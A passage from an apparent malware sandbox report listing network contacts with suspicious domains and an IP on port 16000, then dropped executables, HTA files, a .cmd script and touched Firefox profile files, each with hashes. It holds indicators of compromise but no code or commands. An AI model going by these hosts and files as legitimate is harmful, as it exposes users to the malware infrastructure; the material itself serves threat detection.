| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
Files
memory/1284-0-0x0000000000110000-0x000000000041D000-memory.dmp
memory/1284-1-0x0000000077C94000-0x0000000077C96000-memory.dmp
memory/1284-2-0x0000000000111000-0x0000000000171000-memory.dmp
memory/1284-3-0x0000000000110000-0x000000000041D000-memory.dmp
memory/1284-4-0x0000000000110000-0x000000000041D000-memory.dmp
memory/1284-5-0x0000000000110000-0x000000000041D000-memory.dmp
memory/1284-6-0x0000000000110000-0x000000000041D000-memory.dmp
memory/1284-7-0x0000000000111000-0x0000000000171000-memory.dmp
memory/1284-8-0x0000000000110000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
| MD5 | 1565063ca3d43812789fbf960418659e |
| SHA1 | d710ecdf1861e25498d1886f8c2a44f31826fd55 |
| SHA256 | c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978 |
| SHA512 | eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42 |
memory/1284-15-0x0000000000110000-0x000000000041D000-memory.dmp
memory/2892-13-0x0000000000860000-0x0000000000D1C000-memory.dmp
memory/2892-16-0x0000000000861000-0x000000000088F000-memory.dmp
memory/2892-17-0x0000000000860000-0x0000000000D1C000-memory.dmp
memory/2892-19-0x0000000000860000-0x0000000000D1C000-memory.dmp
memory/2892-29-0x0000000000860000-0x0000000000D1C000-memory.dmp
memory/4276-31-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-32-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-33-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-35-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-34-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/2976-37-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-38-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-39-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
| MD5 | 07164c5597a4fbd5cf8c5ebcc43fcbd3 |
| SHA1 | d8ffc868f9a36ab2323440bc0a263e2e3e52def3 |
| SHA256 | 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3 |
| SHA512 | 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9 |
C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta
| MD5 | fdb4ece761622fc23546239dca7749e9 |
| SHA1 | 37203f5687a548f563a83bc20532e633780cb69d |
| SHA256 | 08d168f25a38424c1c95a2c632855df9629d122c6b0a8f55485f8b48b00a19b2 |
| SHA512 | 74c583d9301f7c8b36c4bbdfe7845ef7672a10de2529d90b4f5a60dd63e22cac6d5793e443986d05feaa29178bf09ec4847469d8dbc4d9a5d0904a3c2af4fae6 |
memory/868-59-0x00000000025F0000-0x0000000002626000-memory.dmp
memory/868-60-0x00000000052C0000-0x00000000058E8000-memory.dmp
memory/868-61-0x0000000004F80000-0x0000000004FA2000-memory.dmp
memory/868-62-0x0000000005220000-0x0000000005286000-memory.dmp
memory/868-63-0x00000000058F0000-0x0000000005956000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_503o0ga1.lyw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/868-73-0x0000000005960000-0x0000000005CB4000-memory.dmp
memory/868-74-0x0000000005F40000-0x0000000005F5E000-memory.dmp
memory/868-75-0x0000000005F60000-0x0000000005FAC000-memory.dmp
memory/4276-76-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4276-77-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/868-78-0x0000000007660000-0x0000000007CDA000-memory.dmp
memory/868-79-0x0000000006440000-0x000000000645A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 606e85c5d2b3250659d1d32ce0235e39 |
| SHA1 | 0d058a45f4caaa69b5bef5d19366fdb0545621aa |
| SHA256 | 2cb585840929e762f092d274dab676cc23954742143959e934043499bc6f0102 |
| SHA512 | 6f0f5101027f041c45da3929ff1e174046de5b149ded799b2543d1198418e0b6172bd2073e063476063fea722f4ccf5d027fd4cd5b0c09ea085aebb3828a3275 |
memory/868-114-0x0000000007400000-0x0000000007496000-memory.dmp
memory/868-115-0x0000000007390000-0x00000000073B2000-memory.dmp
memory/868-116-0x0000000008290000-0x0000000008834000-memory.dmp
memory/3780-124-0x0000000000460000-0x000000000091C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 19778ac0ed7df6211b6d5c869db2b990 |
| SHA1 | 80d3a35e91e7439a3caed7248b6302cd6a954792 |
| SHA256 | f62aea1294114defddfd7f5978103ab0ede9b085c5a0d46a9854e1558eb5a3e9 |
| SHA512 | fd2fe68865a85f0bba9d10c10bce58451b1639ccb0140657d6a120aed27efcc899704824ce75be169af37677b5b0d80851ee8cad0c993af3bbe5b65382525ecb |
memory/404-137-0x0000000006160000-0x00000000064B4000-memory.dmp
memory/3780-140-0x0000000000460000-0x000000000091C000-memory.dmp
memory/404-141-0x0000000006870000-0x00000000068BC000-memory.dmp
C:\Temp\iH0BXcodL.hta
| MD5 | 39c8cd50176057af3728802964f92d49 |
| SHA1 | 68fc10a10997d7ad00142fc0de393fe3500c8017 |
| SHA256 | f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84 |
| SHA512 | cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6 |
memory/3640-149-0x0000000006080000-0x00000000063D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c7682eafc09050ce3e588317d4aca1ea |
| SHA1 | 47adc89821a0ee7deac76c16ba4b4b4e2c8baf5c |
| SHA256 | 5b340ed4f01f8f7d2b65b4672a1e222c00954646134b7c6ff616d1ca4e556b63 |
| SHA512 | dcab48f5ae964b59c4f1d01c8fc31b137aceceb90536971ced2f6ddcb2ddd4589feac6f18e0ef6e276c7d31caf0090ac0a10cdbd96aab333135aead0accb6804 |
memory/3640-155-0x0000000006780000-0x00000000067CC000-memory.dmp
memory/4276-156-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
| MD5 | aa512b143958cbbe85c4fb41bb9ba3fa |
| SHA1 | 46459666d53ecb974385698aa8c306e49c1110ab |
| SHA256 | 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26 |
| SHA512 | 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333 |
memory/860-171-0x0000000000710000-0x00000000010FD000-memory.dmp
memory/916-180-0x0000000000110000-0x00000000005CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/1480-199-0x0000000000450000-0x00000000004C8000-memory.dmp
memory/1712-201-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1712-203-0x0000000000400000-0x0000000000465000-memory.dmp
memory/916-205-0x0000000000110000-0x00000000005CC000-memory.dmp
memory/4276-206-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/860-207-0x0000000000710000-0x00000000010FD000-memory.dmp
memory/860-208-0x0000000000710000-0x00000000010FD000-memory.dmp
memory/3308-209-0x0000000000400000-0x000000000042F000-memory.dmp
memory/3308-211-0x0000000000400000-0x000000000042F000-memory.dmp
memory/860-212-0x0000000000710000-0x00000000010FD000-memory.dmp
memory/3308-216-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe
| MD5 | 84ada09d9801547265d6589b50051295 |
| SHA1 | fa842424381715851e8d8d716afb27da31edd8c1 |
| SHA256 | a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6 |
| SHA512 | 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f |
memory/4352-234-0x0000000000290000-0x0000000000EC3000-memory.dmp
memory/4276-236-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZWLN2AM0\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe
| MD5 | 5af71429b3b21c4ecb55d948a04f92a0 |
| SHA1 | 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0 |
| SHA256 | b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b |
| SHA512 | a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827 |
memory/2724-253-0x00000000009A0000-0x0000000000E35000-memory.dmp
memory/4352-289-0x0000000000290000-0x0000000000EC3000-memory.dmp
memory/4276-290-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4352-291-0x0000000000290000-0x0000000000EC3000-memory.dmp
memory/2724-292-0x00000000009A0000-0x0000000000E35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe
| MD5 | 30305d29528f3aca3b09636d919bd512 |
| SHA1 | 4af875a29e249da70f2da3519334af8fd584c193 |
| SHA256 | 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e |
| SHA512 | a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4 |
memory/3620-302-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4352-304-0x0000000000290000-0x0000000000EC3000-memory.dmp
memory/4240-312-0x0000000000590000-0x000000000089A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe
| MD5 | afc954940e0fc5ca6bdf390e0033a01c |
| SHA1 | aa0193bc48197c86a7ce3401be6607f0e052a319 |
| SHA256 | 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8 |
| SHA512 | b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148 |
memory/2236-338-0x00000000004E0000-0x0000000000B68000-memory.dmp
memory/2236-341-0x00000000004E0000-0x0000000000B68000-memory.dmp
memory/4276-342-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4656-346-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4240-345-0x0000000000590000-0x000000000089A000-memory.dmp
memory/4656-348-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4240-349-0x0000000000590000-0x000000000089A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe
| MD5 | 08552f5efe19801cc3fafe356dccd710 |
| SHA1 | 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9 |
| SHA256 | 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7 |
| SHA512 | 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d |
memory/4276-372-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/4240-375-0x0000000000590000-0x000000000089A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 1cb5707b6b6cf1843bd7d3d1c907cd9c |
| SHA1 | 6a6d04cc8f62e1740b6a5bf5a1fa60c3fde03a84 |
| SHA256 | 445e494674412290f8ff48ba2c9d6fec51f824c18841c89d7b5fa6f982b00ce6 |
| SHA512 | 056c0624169de5ffe4b184d14876e7f43cfd80ce29f67aa95612bec9a0e19bbd99be9609531fa583ee00609917ed2a3ad2eb08ddd4704d0a82f7ea157ec4cf3a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\06b63187-23ff-4a9a-8323-e910eff6e7ce
| MD5 | 13a0d9e7633343e674c11544331374b1 |
| SHA1 | 7e30b7ce662b7823271f044525abc0da30ec02e2 |
| SHA256 | f7e8cf1b4318e92f2839257a61661267bd7e731f23a7883f5b9898923eb5ccb6 |
| SHA512 | 0e767e5434af893931d1559bee83d143e02dbae1059f1175bbc0eecd69fe3ef008b1230c5b2aff8e27f7a9f598efe25eeded18e16a6303f8f9c70a1a01f86ec6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\a234fd4a-c802-4e4f-8cf6-7837f8b68b94
| MD5 | cb9c380d1a5fb6e540219eb43956179a |
| SHA1 | f6834adb4c3f3981ef94bc00e612f82e841ba268 |
| SHA256 | 8c09093b9d430f355c488a820c03a409a296ba20d940952b1a9a623e031912d1 |
| SHA512 | 51af0bc90e91dcbdf3097c09f398a7609fffcb3a4078ca34aef17b56e350cfd6c8a73a3cc372520e70bdf78cb4dcfff212a7a4cc2f004dcdbc9c38779b62f40d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | f5d06bb4feb7525dce73261a5b3ec965 |
| SHA1 | 98b569bdcc14016ec347739f61149e78450cba61 |
| SHA256 | 4c1f593dd218d45752c89e85f5e74516ff3f4d320c4f6ac927f565a95c0d68bc |
| SHA512 | c968ae16c97b9eca95faac41dde2320974099c460d48c1600681a0e0feb47dd441446a5a468fd134e515cf5f76abc9c8ac1370d5b9544f7f529a589f66f15d90 |
memory/4240-597-0x0000000000590000-0x000000000089A000-memory.dmp
memory/5912-599-0x00000000006A0000-0x0000000000B5C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js
| MD5 | ce65d94448e93dbde53b62c6fc805416 |
| SHA1 | 50305e8e9803aaa4a0cc9ec0d6ccc67e93e046fd |
| SHA256 | 084898110c96f2cdbc424236922fd422a261166e3534594c58fc747ab6ed136e |
| SHA512 | 67fc2caed3a998afd8b9fab30d1f7cbc1fb0e6926b3e743d2b8d298ce94e0816c4fd1e5eee51670187fdcec3aac8dc67d93e8578902a7a4ddd4dd1cd5d22708b |
memory/5912-614-0x00000000006A0000-0x0000000000B5C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin
| MD5 | fdeab0a95a1ea63e5b5f2f0afef8fa6c |
| SHA1 | 9f531048a687f0d9b2905208610bc3040515e985 |
| SHA256 | 9555968dfd6a82604a4c943ab49e1cc6cd83ae4b12ae4cc7272f067736e0b5cf |
| SHA512 | 29cf0af6d47bcd9b701b3c3019f573f9afd52ce31064ff04520009cf16c59f6de758b5c5f092b6d1a5bf059a153142ae41f41aae11351009e5130aa39dc785ba |
memory/4276-725-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe
| MD5 | 37259000abc86b85dbb65366443ec3c1 |
| SHA1 | b6cf0ac13b56918992c9c6daa38e791a40f60f88 |
| SHA256 | 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c |
| SHA512 | 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695 |
memory/1836-745-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-747-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-746-0x0000000000970000-0x0000000000DBE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | 16bd85906df571b8e33d645944b2d502 |
| SHA1 | 28530458a4e683aa5ec838882a249d418eced553 |
| SHA256 | 97440130fde6dfa07ffc705ad1f91e8d1c5cc27d98a8e666c58fe9c40a9bd629 |
| SHA512 | 31a7e208b3a833ae28046e7d21ada604b5ffce4171c174539a7cee4ae5d2544b83c75f3a537fa5f0b2cb09cad4add1e9434907eb4c312c315313b26d1c715a4b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AZ1RNKT0\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
| MD5 | a9749ee52eefb0fd48a66527095354bb |
| SHA1 | 78170bcc54e1f774528dea3118b50ffc46064fe0 |
| SHA256 | b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15 |
| SHA512 | 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25 |
memory/4276-826-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/1836-828-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-835-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/4276-840-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/3820-858-0x00000000007B0000-0x0000000000E9E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5b76cbbb82694edd0c611cb130987872 |
| SHA1 | 449401ec72a2c40dfb35acade29fbfe417de8836 |
| SHA256 | fa7bc0dcf96d0524bf2bfceef05f5682f03a10d46c0396e1325b6617906772c3 |
| SHA512 | a3925cabb6ec4eddbd28e4b9a555eb3f917f7bb2a29b96456fcc26e4d1dde91f007972f39b2be501798207c87b045b5f94fb87eedde6fa78efd06edd78ac0e7c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | 7924cb8c38f57af46e40d74243debe63 |
| SHA1 | e3115390802c80932f72ad5ec5aa0004e7ea6acb |
| SHA256 | 814e996603ebcf8c3b75d8a9ac93e0fa19a129bbb02d0543e282d4f98d7e39f2 |
| SHA512 | a1989892402c56e08850f0e94aeb0e41ef9a8a550ff2b7746d005887c177793306bbc8ef895f3f948003e003d90d22adae51838dd6f73f60190880a6a674bc8a |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin
| MD5 | 489eac1766c04d398cefd0d26551a988 |
| SHA1 | 81f3add4214ab19bcca6cc66063682dedf2bf596 |
| SHA256 | c7f624ae5781b3a9d4cb566e3ec9504e3520aa5e77a3e1e5a925a2771fbf9ccd |
| SHA512 | 86d1db56219b650c91cf859865fb439bf83141e89dc74d5cfcaa36dc94f10f9e82d1622020689d44aff5a93c490dc55abbd6556d9f6aa092ff7354ac30a1bb81 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | e748e0c8994ad8b0da72973ed0291bd4 |
| SHA1 | 216606ad1fb1382c589163c31f2793b889f6685d |
| SHA256 | ac9897ceda6ef3dab4410e679086c20e6a744ce43a97fcd7d921ef8e93c7f14d |
| SHA512 | a2d4fff3f119db9dd63f4f19b62b489ed98f20c56567271347f78c802a827d6d58696aee7dce569f1d658383f8ac5b40df3bcd7ec1869193b08144085e639f2a |
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
memory/2020-979-0x00000000003D0000-0x0000000000871000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
memory/4276-1000-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/3820-1001-0x00000000007B0000-0x0000000000E9E000-memory.dmp
C:\ProgramData\CC69A22766873E3E.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cert9.db
| MD5 | f7c6e562ad967ed884393886a94e363f |
